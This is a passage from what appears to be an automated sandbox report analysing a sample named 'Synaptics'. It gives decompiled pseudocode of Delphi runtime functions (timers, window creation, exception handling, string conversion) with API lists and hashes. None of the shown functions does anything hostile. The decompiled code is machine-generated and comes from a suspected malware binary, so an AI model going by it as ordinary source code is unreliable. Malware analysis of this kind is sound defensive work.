                                                                                                                                                                                            • Part of subcall function 00401A9C: RtlLeaveCriticalSection.KERNEL32(0049E5CC,00401B59,00000000,',?,?,00402336,022E0208,3A6E6967,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401B4C
                                                                                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0049E5CC,00000000,7 ), ref: 004021D3
                                                                                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0049E5CC,0040230B), ref: 004022FE
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                                                                                                          • String ID: 7
                                                                                                                                                                                          • API String ID: 2227675388-1331172448
                                                                                                                                                                                          • Opcode ID: d57fdd7a51c297de22ae7a43f37e9dc48cc1f2cd16773fd01e790cee451199b4
                                                                                                                                                                                          • Instruction ID: 4af8bea66c2055acf7768281f877aa53f35be4b0bc747d0b7dec25e4a478ddf4
                                                                                                                                                                                          • Opcode Fuzzy Hash: d57fdd7a51c297de22ae7a43f37e9dc48cc1f2cd16773fd01e790cee451199b4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8441E2B1A04200DFD715CFAADE9562977E0FB68328B6542BFD401E77E1E2799C41CB08
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0042F680 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 60%
                                                                                                                                                                                          			E0042F680(void* __eax, void* __ebx, void* __ecx, void* __esi) {
				char _v8;
				int _t17;
				intOrPtr _t18;
				void* _t23;
				intOrPtr _t28;
				int _t32;
				intOrPtr _t35;

				_push(0);
				_t23 = __eax;
				_push(_t35);
				_push(0x42f6ff);
				_push( *[fs:eax]);
				 *[fs:eax] = _t35;
				KillTimer( *(__eax + 0x34), 1);
				_t32 =  *(_t23 + 0x30);
				if(_t32 != 0 &&  *((char*)(_t23 + 0x40)) != 0 &&  *((short*)(_t23 + 0x3a)) != 0) {
					_t17 = SetTimer( *(_t23 + 0x34), 1, _t32, 0); // executed
					if(_t17 == 0) {
						_t18 =  *0x49de08; // 0x422f68
						E00406A70(_t18,  &_v8);
						E0040D144(_v8, 1);
						E00404378();
					}
				}
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E0042F706);
				return E004049C0( &_v8);
			}










                                                                                                                                                                                          0x0042f683
                                                                                                                                                                                          0x0042f687
                                                                                                                                                                                          0x0042f68b
                                                                                                                                                                                          0x0042f68c
                                                                                                                                                                                          0x0042f691
                                                                                                                                                                                          0x0042f694
                                                                                                                                                                                          0x0042f69d
                                                                                                                                                                                          0x0042f6a2
                                                                                                                                                                                          0x0042f6a7
                                                                                                                                                                                          0x0042f6bf
                                                                                                                                                                                          0x0042f6c6
                                                                                                                                                                                          0x0042f6cb
                                                                                                                                                                                          0x0042f6d0
                                                                                                                                                                                          0x0042f6df
                                                                                                                                                                                          0x0042f6e4
                                                                                                                                                                                          0x0042f6e4
                                                                                                                                                                                          0x0042f6c6
                                                                                                                                                                                          0x0042f6eb
                                                                                                                                                                                          0x0042f6ee
                                                                                                                                                                                          0x0042f6f1
                                                                                                                                                                                          0x0042f6fe

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • KillTimer.USER32(?,00000001,00000000,0042F6FF,?,?,?,00000000,?,0042F719,004982F9,00000000,00000001,?,0049A117,00000000), ref: 0042F69D
                                                                                                                                                                                          • SetTimer.USER32(?,00000001,?,00000000), ref: 0042F6BF
                                                                                                                                                                                            • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Timer$KillLoadString
                                                                                                                                                                                          • String ID: h/B
                                                                                                                                                                                          • API String ID: 1423459280-860576603
                                                                                                                                                                                          • Opcode ID: 1e7f4a3e1a81165d3749bce0843d0aab77b0c367e19ef7a19d8ea95de236c58b
                                                                                                                                                                                          • Instruction ID: c638335ebb45f94185b8bc64c2a04c90921daa6f7a9a6c3e75923d264c20285e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e7f4a3e1a81165d3749bce0843d0aab77b0c367e19ef7a19d8ea95de236c58b
                                                                                                                                                                                          • Instruction Fuzzy Hash: C601B571B04210ABDB10EB61DC92F5A37BCDB45708FD1007AFD00AB2D2D7B9AC44C658
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00407A8C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00407A8C(long __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
				CHAR* _v8;
				void* _t13;
				struct HWND__* _t24;
				CHAR* _t29;
				long _t32;

				_v8 = _t29;
				_t32 = __eax;
				_t13 = E00402C0C();
				_t24 = CreateWindowExA(_t32, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				E00402BFC(_t13);
				return _t24;
			}








                                                                                                                                                                                          0x00407a93
                                                                                                                                                                                          0x00407a98
                                                                                                                                                                                          0x00407a9a
                                                                                                                                                                                          0x00407acb
                                                                                                                                                                                          0x00407ad4
                                                                                                                                                                                          0x00407ae0

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateWindow
                                                                                                                                                                                          • String ID: TPUtilWindow$x,B
                                                                                                                                                                                          • API String ID: 716092398-1057714546
                                                                                                                                                                                          • Opcode ID: 6f03bbe19ce8bec98a003051f3de9d9a43124493f49fa58d3969b4d3575b5c8e
                                                                                                                                                                                          • Instruction ID: 8ac853332085b9bd21b4b606e16f655482de0c328e5100a7f3fe009a2cef9f92
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f03bbe19ce8bec98a003051f3de9d9a43124493f49fa58d3969b4d3575b5c8e
                                                                                                                                                                                          • Instruction Fuzzy Hash: EDF092B2704158BF9B80DE9DDD85EDB77ECEB4C264B05416AFA0CE3241D674ED108BA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0042C5E4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 58%
                                                                                                                                                                                          			E0042C5E4(int _a4) {
				void* __ebx;
				void* __ebp;
				signed int _t2;
				signed int _t3;
				void* _t7;
				int _t8;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t18;

				_t8 = _a4;
				if( *0x49e928 == 0) {
					 *0x49e900 = E0042C4FC(0, _t8,  *0x49e900, _t17, _t18);
					_t7 =  *0x49e900(_t8); // executed
					return _t7;
				}
				_t3 = _t2 | 0xffffffff;
				_t12 = _t8 + 0xffffffb4 - 2;
				__eflags = _t12;
				if(__eflags < 0) {
					_t3 = 0;
				} else {
					if(__eflags == 0) {
						_t8 = 0;
					} else {
						_t13 = _t12 - 1;
						__eflags = _t13;
						if(_t13 == 0) {
							_t8 = 1;
						} else {
							__eflags = _t13 - 0xffffffffffffffff;
							if(_t13 - 0xffffffffffffffff < 0) {
								_t3 = 1;
							}
						}
					}
				}
				__eflags = _t3 - 0xffffffff;
				if(_t3 != 0xffffffff) {
					return _t3;
				} else {
					return GetSystemMetrics(_t8);
				}
			}













                                                                                                                                                                                          0x0042c5e8
                                                                                                                                                                                          0x0042c5f2
                                                                                                                                                                                          0x0042c606
                                                                                                                                                                                          0x0042c60c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0042c60c
                                                                                                                                                                                          0x0042c614
                                                                                                                                                                                          0x0042c61c
                                                                                                                                                                                          0x0042c61c
                                                                                                                                                                                          0x0042c61f
                                                                                                                                                                                          0x0042c633
                                                                                                                                                                                          0x0042c621
                                                                                                                                                                                          0x0042c621
                                                                                                                                                                                          0x0042c637
                                                                                                                                                                                          0x0042c623
                                                                                                                                                                                          0x0042c623
                                                                                                                                                                                          0x0042c623
                                                                                                                                                                                          0x0042c624
                                                                                                                                                                                          0x0042c63b
                                                                                                                                                                                          0x0042c626
                                                                                                                                                                                          0x0042c627
                                                                                                                                                                                          0x0042c62a
                                                                                                                                                                                          0x0042c62c
                                                                                                                                                                                          0x0042c62c
                                                                                                                                                                                          0x0042c62a
                                                                                                                                                                                          0x0042c624
                                                                                                                                                                                          0x0042c621
                                                                                                                                                                                          0x0042c640
                                                                                                                                                                                          0x0042c643
                                                                                                                                                                                          0x0042c64d
                                                                                                                                                                                          0x0042c645
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0042c646

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 0042C646
                                                                                                                                                                                            • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(74690000,00000000), ref: 0042C57C
                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL ref: 0042C60C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressCallbackDispatcherMetricsProcSystemUser
                                                                                                                                                                                          • String ID: GetSystemMetrics
                                                                                                                                                                                          • API String ID: 54681038-96882338
                                                                                                                                                                                          • Opcode ID: 7153245a6465a9df4cfdb0ee701d3aa453044e9105dccc5ca4f6593e8bd1a17a
                                                                                                                                                                                          • Instruction ID: e76955a9c08610525c92f9aeab2c1040e91631f36ff756307eb2880b474183d5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7153245a6465a9df4cfdb0ee701d3aa453044e9105dccc5ca4f6593e8bd1a17a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6EF0B4B07045649ACB709B3DBEC962F7645A7A5374FE0AF33A111472D1C2BCA842529D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041DB98 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                                                                          			E0041DB98(void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, void* _a4, signed short _a8) {
				char _v5;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _t29;
				void* _t62;
				void* _t63;
				intOrPtr _t67;
				intOrPtr _t69;
				char _t70;
				intOrPtr _t73;
				void* _t86;
				void* _t88;
				void* _t89;
				intOrPtr _t90;

				_t70 = __edx;
				_t63 = __ecx;
				_t88 = _t89;
				_t90 = _t89 + 0xffffffdc;
				_v36 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				if(__edx != 0) {
					_t90 = _t90 + 0xfffffff0;
					_t29 = E00403F10(_t29, _t88);
				}
				_t86 = _t63;
				_v5 = _t70;
				_t62 = _t29;
				_t84 = _a8;
				_push(_t88);
				_push(0x41dcc1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t90;
				if(_a8 != 0xffff) {
					E0041DA90(E004098C4(_t86, _t84 & 0x0000ffff), 0);
					if( *((intOrPtr*)(_t62 + 4)) < 0) {
						E00409E98(_t86,  &_v36);
						_v24 = _v36;
						_v20 = 0xb;
						E0040C918(GetLastError(),  &_v40);
						_v16 = _v40;
						_v12 = 0xb;
						_t67 =  *0x49d6c8; // 0x417484
						E0040D23C(_t62, _t67, 1, _t84, _t86, 1,  &_v24);
						E00404378();
					}
				} else {
					E0041DA90(E00409940(), 0);
					if( *((intOrPtr*)(_t62 + 4)) < 0) {
						E00409E98(_t86,  &_v28);
						_v24 = _v28;
						_v20 = 0xb;
						E0040C918(GetLastError(),  &_v32);
						_v16 = _v32;
						_v12 = 0xb;
						_t69 =  *0x49de3c; // 0x41747c
						E0040D23C(_t62, _t69, 1, _t84, _t86, 1,  &_v24); // executed
						E00404378(); // executed
					}
				}
				_pop(_t73);
				 *[fs:eax] = _t73;
				_push(E0041DCC8);
				return E004049E4( &_v40, 4);
			}























                                                                                                                                                                                          0x0041db98
                                                                                                                                                                                          0x0041db98
                                                                                                                                                                                          0x0041db99
                                                                                                                                                                                          0x0041db9b
                                                                                                                                                                                          0x0041dba3
                                                                                                                                                                                          0x0041dba6
                                                                                                                                                                                          0x0041dba9
                                                                                                                                                                                          0x0041dbac
                                                                                                                                                                                          0x0041dbb1
                                                                                                                                                                                          0x0041dbb3
                                                                                                                                                                                          0x0041dbb6
                                                                                                                                                                                          0x0041dbb6
                                                                                                                                                                                          0x0041dbbb
                                                                                                                                                                                          0x0041dbbd
                                                                                                                                                                                          0x0041dbc0
                                                                                                                                                                                          0x0041dbc2
                                                                                                                                                                                          0x0041dbc7
                                                                                                                                                                                          0x0041dbc8
                                                                                                                                                                                          0x0041dbcd
                                                                                                                                                                                          0x0041dbd0
                                                                                                                                                                                          0x0041dbd8
                                                                                                                                                                                          0x0041dc53
                                                                                                                                                                                          0x0041dc5c
                                                                                                                                                                                          0x0041dc63
                                                                                                                                                                                          0x0041dc6b
                                                                                                                                                                                          0x0041dc6e
                                                                                                                                                                                          0x0041dc7a
                                                                                                                                                                                          0x0041dc82
                                                                                                                                                                                          0x0041dc85
                                                                                                                                                                                          0x0041dc8f
                                                                                                                                                                                          0x0041dc9c
                                                                                                                                                                                          0x0041dca1
                                                                                                                                                                                          0x0041dca1
                                                                                                                                                                                          0x0041dbda
                                                                                                                                                                                          0x0041dbea
                                                                                                                                                                                          0x0041dbf3
                                                                                                                                                                                          0x0041dbfe
                                                                                                                                                                                          0x0041dc06
                                                                                                                                                                                          0x0041dc09
                                                                                                                                                                                          0x0041dc15
                                                                                                                                                                                          0x0041dc1d
                                                                                                                                                                                          0x0041dc20
                                                                                                                                                                                          0x0041dc2a
                                                                                                                                                                                          0x0041dc37
                                                                                                                                                                                          0x0041dc3c
                                                                                                                                                                                          0x0041dc3c
                                                                                                                                                                                          0x0041dbf3
                                                                                                                                                                                          0x0041dca8
                                                                                                                                                                                          0x0041dcab
                                                                                                                                                                                          0x0041dcae
                                                                                                                                                                                          0x0041dcc0

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,0041DCC1,?,00000000,00418E54,00000001), ref: 0041DC0D
                                                                                                                                                                                            • Part of subcall function 004098C4: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,00000000,00000000,00418E54,0041DC4D,00000000,0041DCC1,?,00000000,00418E54), ref: 00409912
                                                                                                                                                                                            • Part of subcall function 00409E98: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,00000000,00418E54,0041DC68,00000000,0041DCC1,?,00000000,00418E54,00000001), ref: 00409EB7
                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,0041DCC1,?,00000000,00418E54,00000001), ref: 0041DC72
                                                                                                                                                                                            • Part of subcall function 0040C918: FormatMessageA.KERNEL32(00003200,00000000,00000000,00000000,?,00000100,00000000,00418E54,0041DC7F,00000000,0041DCC1,?,00000000,00418E54,00000001), ref: 0040C937
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLast$CreateFileFormatFullMessageNamePath
                                                                                                                                                                                          • String ID: |tA
                                                                                                                                                                                          • API String ID: 1652710734-3894576594
                                                                                                                                                                                          • Opcode ID: a4ee2061477b76fc7522b31128d4c20a63e750d3827f4c194167cc82d83d4c19
                                                                                                                                                                                          • Instruction ID: cf494aa496f929f16128ea2aa2fb3604e401f875384fb3819420099628f7d97d
                                                                                                                                                                                          • Opcode Fuzzy Hash: a4ee2061477b76fc7522b31128d4c20a63e750d3827f4c194167cc82d83d4c19
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D3181B0E046058FCB00EFA6C8816EEB7B1AB49304F50857AE904B7391D7785E45CBAA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004787F4 Relevance: 4.6, APIs: 3, Instructions: 93threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                                                                          			E004787F4(intOrPtr* __eax, intOrPtr __ecx, char* __edx, intOrPtr _a4) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				int _v24;
				short* _v28;
				intOrPtr* _v32;
				void* __edi;
				signed int _t47;
				intOrPtr _t56;
				intOrPtr* _t57;
				void* _t60;
				char* _t62;
				void* _t70;
				int _t71;
				void* _t73;
				intOrPtr _t74;
				short* _t75;

				_v16 = __ecx;
				_v8 = __edx;
				_v32 = __eax;
				_t62 = _v8;
				_t70 = 0;
				_v12 = _t74;
				_t75 = _t74 - (_v16 + 1 << 2);
				_v20 = _t75;
				do {
					_t71 = E00409F88(_t62, _t70);
					_v24 = MultiByteToWideChar(0, 0, _t62, _t71, 0, 0) + 1;
					_t75 = _t75 - (_v24 + _v24 + 0x00000003 & 0xfffffffc);
					_v28 = _t75;
					if(_t70 != 0) {
						_t47 = _v16 - _t70;
						__eflags = _t47;
						 *((intOrPtr*)(_v20 + _t47 * 4)) = _v28;
					} else {
						 *_v20 = _v28;
					}
					MultiByteToWideChar(0, 0, _t62, _t71, _v28, _v24);
					_t68 = _v24;
					 *((short*)(_v28 + _v24 * 2 - 2)) = 0;
					_t62 =  &(_t62[_t71 + 1]);
					_t70 = _t70 + 1;
				} while (_t70 != _v16);
				_push(_a4);
				_push(GetThreadLocale());
				_push(_v16);
				_push(_v20);
				_t56 =  *0x49d770; // 0x49b500
				_push(_t56);
				_t57 = _v32;
				_push(_t57);
				if( *((intOrPtr*)( *_t57 + 0x14))() != 0x80020006) {
					_t60 = E004781BC(_t59, _t68, __eflags);
				} else {
					_t60 = E004787C0(_t73);
				}
				return _t60;
			}





















                                                                                                                                                                                          0x004787fd
                                                                                                                                                                                          0x00478800
                                                                                                                                                                                          0x00478803
                                                                                                                                                                                          0x00478806
                                                                                                                                                                                          0x00478809
                                                                                                                                                                                          0x0047880b
                                                                                                                                                                                          0x00478815
                                                                                                                                                                                          0x0047881a
                                                                                                                                                                                          0x0047881c
                                                                                                                                                                                          0x00478823
                                                                                                                                                                                          0x00478835
                                                                                                                                                                                          0x00478843
                                                                                                                                                                                          0x00478848
                                                                                                                                                                                          0x0047884c
                                                                                                                                                                                          0x0047885b
                                                                                                                                                                                          0x0047885b
                                                                                                                                                                                          0x00478863
                                                                                                                                                                                          0x0047884e
                                                                                                                                                                                          0x00478854
                                                                                                                                                                                          0x00478854
                                                                                                                                                                                          0x00478874
                                                                                                                                                                                          0x0047887c
                                                                                                                                                                                          0x0047887f
                                                                                                                                                                                          0x00478887
                                                                                                                                                                                          0x00478889
                                                                                                                                                                                          0x0047888a
                                                                                                                                                                                          0x00478892
                                                                                                                                                                                          0x00478898
                                                                                                                                                                                          0x0047889c
                                                                                                                                                                                          0x004788a0
                                                                                                                                                                                          0x004788a1
                                                                                                                                                                                          0x004788a6
                                                                                                                                                                                          0x004788a7
                                                                                                                                                                                          0x004788aa
                                                                                                                                                                                          0x004788b5
                                                                                                                                                                                          0x004788c0
                                                                                                                                                                                          0x004788b7
                                                                                                                                                                                          0x004788b8
                                                                                                                                                                                          0x004788bd
                                                                                                                                                                                          0x004788ce

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?), ref: 0047882F
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?), ref: 00478874
                                                                                                                                                                                          • GetThreadLocale.KERNEL32(?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?), ref: 00478893
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharMultiWide$LocaleThread
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4086549855-0
                                                                                                                                                                                          • Opcode ID: 7c15dcf62a662ed130b5958e6fba4de64ea28af6bf3176f60dbcfd47ddc69cad
                                                                                                                                                                                          • Instruction ID: a51c77bdc8ed0243a2616cf9538eba40c564d6da85687872f4e0f106e925e268
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c15dcf62a662ed130b5958e6fba4de64ea28af6bf3176f60dbcfd47ddc69cad
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B310DB1E40209AFCB10DB99CC86BAFBBF8EF59310F10415AF518E7391D634AD018BA5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040408A Relevance: 4.6, APIs: 3, Instructions: 83COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 63%
                                                                                                                                                                                          			E0040408A(void* __ebx, void* __edi, void* __esi, void* __ebp, struct _EXCEPTION_POINTERS _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				struct _EXCEPTION_RECORD* _t22;
				intOrPtr* _t25;
				long _t28;
				long _t30;
				long _t31;
				long _t32;
				void* _t33;
				void* _t38;
				long _t41;
				intOrPtr* _t43;
				intOrPtr _t44;
				void* _t45;
				void* _t47;
				void* _t48;
				intOrPtr _t50;

				_t48 = __ebp;
				_t47 = __esi;
				_t45 = __edi;
				_t33 = __ebx;
				_t22 = _a4.ExceptionRecord;
				if((_t22->ExceptionFlags & 0x00000006) == 0) {
					_t41 = _t22->ExceptionInformation[1];
					_t38 = _t22->ExceptionInformation;
					if(_t22->ExceptionCode == 0xeedfade) {
						L11:
						if( *0x49b030 <= 1 ||  *0x49b02c > 0) {
							goto L14;
						}
						_t28 = UnhandledExceptionFilter( &_a4);
						_t38 = _t38;
						_t41 = _t41;
						_t22 = _t22;
						if(_t28 != 0) {
							goto L14;
						}
					} else {
						asm("cld");
						E00403B20(_t22);
						_t43 =  *0x49e010; // 0x40d76c
						if(_t43 != 0) {
							_t30 =  *_t43();
							if(_t30 != 0) {
								_t44 = _a12;
								if(_a4.ExceptionRecord->ExceptionCode == 0xeefface) {
									L10:
									_t41 = _t30;
									_t22 = _a4.ExceptionRecord;
									_t38 = _t22->ExceptionAddress;
									goto L11;
								} else {
									_t30 = E00403FA4(_t30, _t44, __edi);
									if( *0x49b030 <= 0 ||  *0x49b02c > 0) {
										goto L10;
									} else {
										_t31 = UnhandledExceptionFilter( &_a4);
										_t32 = _t30;
										if(_t31 != 0) {
											_t41 = _t32;
											_t22 = _a4.ExceptionRecord;
											_t38 = _t22->ExceptionAddress;
											L14:
											_t22->ExceptionFlags = _t22->ExceptionFlags | 0x00000002;
											 *0x49e018(_a8, "true", _t22, 0, _t38, _t41, _t22,  *[fs:ebx], _t48, _t45, _t47, _t33); // executed
											_t46 = _v8;
											_t25 = E00406CDC();
											_push( *_t25);
											 *_t25 = _t50;
											 *((intOrPtr*)(_v8 + 4)) = E00404190;
											E00403FF4(_t25,  *((intOrPtr*)(_t46 + 4)) + 5, _t47);
											goto __ebx;
										}
									}
								}
							}
						}
					}
				}
				return 1;
			}



















                                                                                                                                                                                          0x0040408a
                                                                                                                                                                                          0x0040408a
                                                                                                                                                                                          0x0040408a
                                                                                                                                                                                          0x0040408a
                                                                                                                                                                                          0x0040408c
                                                                                                                                                                                          0x00404097
                                                                                                                                                                                          0x004040a3
                                                                                                                                                                                          0x004040a6
                                                                                                                                                                                          0x004040a9
                                                                                                                                                                                          0x00404119
                                                                                                                                                                                          0x00404120
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00404133
                                                                                                                                                                                          0x0040413b
                                                                                                                                                                                          0x0040413c
                                                                                                                                                                                          0x0040413d
                                                                                                                                                                                          0x0040413e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004040ab
                                                                                                                                                                                          0x004040ab
                                                                                                                                                                                          0x004040ac
                                                                                                                                                                                          0x004040b1
                                                                                                                                                                                          0x004040b9
                                                                                                                                                                                          0x004040bf
                                                                                                                                                                                          0x004040c3
                                                                                                                                                                                          0x004040c9
                                                                                                                                                                                          0x004040d7
                                                                                                                                                                                          0x00404110
                                                                                                                                                                                          0x00404110
                                                                                                                                                                                          0x00404112
                                                                                                                                                                                          0x00404116
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004040d9
                                                                                                                                                                                          0x004040d9
                                                                                                                                                                                          0x004040e5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004040f0
                                                                                                                                                                                          0x004040f6
                                                                                                                                                                                          0x004040fe
                                                                                                                                                                                          0x004040ff
                                                                                                                                                                                          0x00404105
                                                                                                                                                                                          0x00404107
                                                                                                                                                                                          0x0040410b
                                                                                                                                                                                          0x00404140
                                                                                                                                                                                          0x00404140
                                                                                                                                                                                          0x0040415e
                                                                                                                                                                                          0x00404164
                                                                                                                                                                                          0x00404168
